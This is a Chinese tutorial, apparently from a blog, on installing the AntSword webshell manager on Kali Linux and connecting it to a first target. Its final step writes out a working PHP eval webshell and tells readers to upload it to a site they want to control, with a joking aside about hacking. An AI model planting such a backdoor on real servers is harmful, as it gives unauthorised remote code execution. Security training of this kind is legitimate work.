简介
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具,其核心是当年的中国菜刀。中国蚁剑推崇模块化的开发思想,遵循开源,其主要核心功能主要有以下几种
-
Shell代理功能
-
Shell管理
-
文件管理
-
虚拟终端
-
数据库管理
-
插件市场
-
插件开发
当然,开发版本针对有一定编程基础的开发者,你可以根据阅读文档或者分析源码了解熟悉整个应用的执行流程,然后便可随意对代码进行修改增强个性化自定义。
1.下载加载器
中国蚁剑的安装分为两步,安装加载器和加载核心源码。官方github下载地址:https://github.com/AntSwordProject/
左边是源码,其实不用特意下载,后面可以用加载器自动下载。
选择适合自己系统版本的,本人使用的是VMware虚拟机kali,选择的是linux-x64,然后下载。
下载后将其解压,我的路径为/home/winde/下载/AntSword-Loader-v4.0.3-linux-x64/
这里需要说明一下,我初始是在虚拟机kali的浏览器下载的,然后加压老是失败,好像虚机kali总是这个问题(网络),因此我是在本人主机里下载,然后上传到kali里的。,如果你遇到相同的问题,不妨试试这个。
2.打开加载器
接下来进入加载器路径
cd /home/winde/下载/AntSword-Loader-v4.0.3-linux-x64/
此时找一个下载核心代码的路径,我个人习惯,直接在/home/winde/下载/AntSword-Loader-v4.0.3-linux-x64/ 下面建了一个antsword的文件夹。
然后输入下方命令打开
./AntSword
3.初始化(下载核心源码)
点击初始化,找到刚刚创建的antsword文件夹,点击ok,然后等待下载
由于是国外资源,可能比较慢,等待下载完,自动退出,我们重新启动 仍是命令行 ./AntSword
接下来就可以使用大家的大宝剑了
4.建立第一个实例
1.编写一个木马,如
<?php @eval($_POST['chopper']);?> ,密码可自定义
这里只是一个简单例子,然后上传到你要管理(黑)的网站目录下。
1.中国蚁剑连接
然后打开中国蚁剑,右键,添加数据
输入你放木马的网站url地址,连接密码为刚刚木马代码中的chopper,编码器按照需求选,请求信息和其他设置都可以设置,我这个比较简单,就不设置了,设置完,点击添加,提示成功
右键可以进行文件管理、打开虚拟终端、数据操作等。接下来的探索就看大家自己发挥啦!
